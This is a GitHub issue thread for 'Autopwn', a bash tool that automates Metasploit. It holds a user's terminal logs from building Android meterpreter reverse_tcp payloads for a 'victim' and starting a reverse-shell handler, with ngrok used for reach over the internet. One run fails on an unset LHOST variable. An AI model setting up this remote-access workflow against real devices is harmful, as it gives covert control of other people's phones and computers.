rpranshu / Autopwn

A simple bash based metasploit automation tool!
https://rpranshu.github.io/Autopwn/
Other
120 stars 29 forks source link

The value specified for PAYLOAD is not valid (LHOST => $ipad) #8

Open Drjacky opened 11 months ago

Drjacky commented 11 months ago
Now choose your victim`s OS
 Press 1 for android
or
Press 2 for windows
1
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10233 bytes

payload $payload created successfully in
/Autopwn
starting the $payload handler.....
This copy of metasploit-framework is more than two weeks old.
 Consider running 'msfupdate' to update to the latest version.
[*] Using configured payload generic/shell_reverse_tcp
LHOST => $ipad
LPORT => 4444
[-] The value specified for PAYLOAD is not valid.
[-] Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
Drjacky commented 11 months ago

And with over internet:

Press 1 for WAN (over the internet)
Press 2 for LAN (On the same network)
1
start ngrok on your device, by opening
a new window in the terminal
and type "ngrok tcp 4444" then,
note down the port number after tcp://0.ngrok.tcp.io:"<port>"
and paste it below
12348
name of the desired file
autopwninternet
Now choose your victim`s OS
 Press 1 for android
or
Press 2 for windows
1
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10239 bytes

payload $payload created successfully in
/Autopwn
starting the $payload handler.....
This copy of metasploit-framework is more than two weeks old.
 Consider running 'msfupdate' to update to the latest version.
[*] Using configured payload generic/shell_reverse_tcp
LHOST => 0.0.0.0
LPORT => 4444
PAYLOAD => android/meterpreter/reverse_tcp
[*] Started reverse TCP handler on 0.0.0.0:4444